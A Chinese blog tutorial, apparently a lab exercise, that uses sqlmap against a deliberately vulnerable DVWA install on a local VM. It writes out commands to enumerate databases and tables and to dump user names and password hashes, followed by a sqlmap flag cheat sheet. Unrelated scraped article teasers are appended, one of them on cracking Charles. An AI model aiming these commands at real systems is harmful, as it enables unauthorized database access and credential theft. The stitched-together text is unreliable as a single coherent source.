技术标签: Linux 安全 渗透测试 信息安全 数据库 sql
本文共有772字和12张插图,读完大约需要5分钟。
本文作为一个实验,练习一下sql注入。
本文共有670个字、12张图片,读完大约需要3分钟。
一台CentOS7 32位 虚拟机,一台Kali 2020.1b 32位 虚拟机。CentOS上安装LNMP环境、DVWA,Kali虚拟机系统本身带有sqlmap。
在Kali的浏览器上访问搭建好的dvwa,登录admin用户之后点DVWA Security,在下拉框中选Low,点Submit,
点SQL Injection,点Submit
复制浏览器地址栏的URL
在Kali里打开Sqlmap,输入如下命令,
sqlmap -u "http://192.168.1.128/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=blb32d0eb5arnt0r80eloeblb1" --batch
检测到对方的DBM为5.5以上版本:
输入如下命令:
sqlmap -u “URL” --cookie “ ” --batch --dbs //注入数据库
检测到对方的数据库名称
输入如下命令:
sqlmap -u “URL” --cookie “ ” --batch -D dvwa --tables
获取到数据库名为dvwa中的表名:
输入如下命令:
sqlmap -u “URL” --cookie “ ” --batch --users --passwords
获取到数据库管理系统的用户名和密码:
输入如下命令
sqlmap -u “URL” --cookie “ ” --batch -D dvwa -T users -C “user,password” --dump
获取到名为dvwa的数据库中表名为users中的用户名和密码
输入如下命令
sqlmap -u “URL” --tables //猜表名
获取到数据库中所有的表名:
输入如下命令
sqlmap -u “URL” --columns -T //猜解列名
测试不成功,获取失败:
输入如下命令
sqlmap -u “URL” --dump -C “列名” -T “表名” //爆出字段数据
测试不成功,获取失败:
--dbs //所有数据库
--tables //所有表
--columns //所有列
--users //用户名
---count //统计条数
--level //测试等级 (1-5) 默认1 cookie 2 http 头3
文章浏览阅读2.1k次,点赞5次,收藏29次。底成本小车, esp32, micropython, wifi, 浏览器控制控制(四轮版)_远程控制wifi遥控小车
文章浏览阅读306次。将网络适配器中只留下一个自己用的或许有帮助。_patchdll打开闪退
文章浏览阅读429次。报错信息如下:[Code: 1093, SQL State: HY000] You can’t specify target table ‘bd_bankaccbas’ for update in FROM clause译文:不能在FROM子句中指定目标表‘bd_bankaccbas’进行更新。有问题的SQL语句如下,它在oracle数据库的语法是支持的,但是mysql就不支持直接这么写:from和update都是同一张表。<span style="col..._you can't specify target table 't_bill' for update in from clause
文章浏览阅读421次。为什么80%的码农都做不了架构师?>>> ..._@jmslistener rabitmq
文章浏览阅读414次。转载:https://mp.weixin.qq.com/s/VQb_mAFbStQXurtByBa0oQ_测试版cpu是怎么流出的?
文章浏览阅读1.5w次,点赞91次,收藏384次。Nginx - 学相伴分享人:秦疆(遇见狂神说)公司产品出现瓶颈?我们公司项目刚刚上线的时候,并发量小,用户使用的少,所以在低并发的情况下,一个jar包启动应用就够了,然后内部tomcat返回内容给用户。但是慢慢的,使用我们平台的用户越来越多了,并发量慢慢增大了,这时候一台服务器满足不了我们的需求了。于是我们横向扩展,又增加了服务器。这个时候几个项目启动在不同的服务器上,用户要访问,就需要增加一个代理服务器了,通过代理服务器来帮我们转发和处理请求。我们希望这个代理服务器可以帮助我们接_遇见狂神说 nginx
文章浏览阅读496次。不靠谱的博客太多了。。。网上各种方法搞得人头大,明明超级简单,但信息接收太多反而对心理造成极大负担我试了很多方法,包括各博客用清华源等等下载的、怎么离线安装、还有下载cudann啥的,其实重点很明确,就是确定自己的cuda版本和python版本,然后去官网复制命令安装。不知道折腾了这么久 我的电脑会不会有啥影响,众多没装成功pytorch会崩掉我的电脑吗。。下面是我的安装过程:先确定python版本win+R,输入cmd,打开命令窗口,然后输入python即可看到自己的版本确定是否有_python官网cuda9.2
文章浏览阅读419次,点赞12次,收藏10次。已有业务:全局业务异常处理、参数校验、基于JWT的登录认证、登录拦截器、Redis认证优化、分页查询
文章浏览阅读171次。1 安装在官网下载对应版本, 如果要破解,请找到破解用 charles.jar(charles用java写的),替换掉安装目录中 jar 文件2 取得管理权限下载证书pc移动端证书help -> proxy ssl -> 选择对应的选项,安装好选项,授权永久信任,再输入当前用户密,最后输入 grant 用户权限密码(如果自己的电脑无需)3 使用charles 配置..._macbook charles method connection
文章浏览阅读7.3k次,点赞30次,收藏133次。2023最新Android Studio安装、卸载、解决c盘占用教程,从安装到hello world运行_build configuration language
文章浏览阅读245次。摘要:这项工作解决了一个具有挑战性的问题,即从单目视频中估计完整的三维人体形状和姿态。由于现实世界的三维网格标记数据集有限,目前大多数的三维人体形状重建方法只关注单一的RGB图像,丢失了所有的时间信息。与此相反,我们提出了一种临时细化的图形网,包括图像级模块和视频级模块,来解决这一问题。imagelevel模块是用于从图像中进行人体形状和姿态估计的图U-Nets,其中图卷积神经网络(Graph CNN)有助于相邻顶点的信息交流,U-Nets架构扩大了每个顶点的接受域,融合了高层和低层特征。videolev_temporally refined graph u-nets for human shape and pose estimation from mon
文章浏览阅读2.0k次。注意:Oracle安装不能用root用户安装,必须新建用户安装1、 sqlplus命令不识别问题(bash :sqlplus command not found)当你首次安装oracle后,也许会出现这种情况,第一次或许有点棘手,不知道如何改怎么办。这时不用着急,想想Linux里面的命令是如何运行的,如adduser等,我们发现是因为在/bin/文件夹下有这样的一个文件adduser,于是我们也想..._ubuntu中oracle提示sqlpus: command not found